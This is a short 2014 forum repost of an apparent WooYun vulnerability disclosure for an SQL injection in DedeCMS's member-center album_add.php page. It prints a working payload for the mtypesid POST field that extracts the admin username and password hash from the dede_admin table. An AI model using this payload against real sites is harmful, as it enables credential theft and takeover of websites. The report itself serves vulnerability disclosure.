立即注册 找回密码
首页>站长交流专区>站长头条>Dedecms会员中心album_add.php页面SQL注...
小草根

Dedecms会员中心album_add.php页面SQL注入漏洞

作者:小草根   发布时间:2014-09-28 10:16   回复数:0   浏览数:448
小草根
4480小草根管理员
2014-09-28 10:16:34
4480 2014-09-28 10:16:34
话题: 会员 中心
简要描述:[p=25, null, left][color=rgb(0, 0, 0)]注册和关注wooyun好久了,dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的
漏洞需要会员,所以比较鸡肋啦[/p]详细说明:[p=25, null, left][color=rgb(0, 0, 0)]发表文章处,post表单的mtypesid可以注入

/dedecmsnew/member/album_add.php



注入的代码:

mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'',

'','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

[/p][p=25, null, left][color=rgb(0, 0, 0)][/p]
漏洞证明:
[p=25, null, left][color=rgb(0, 0, 0)][/p]
分享喜欢 0回复
回复
游客
登录后才可以回帖,登录 或者 注册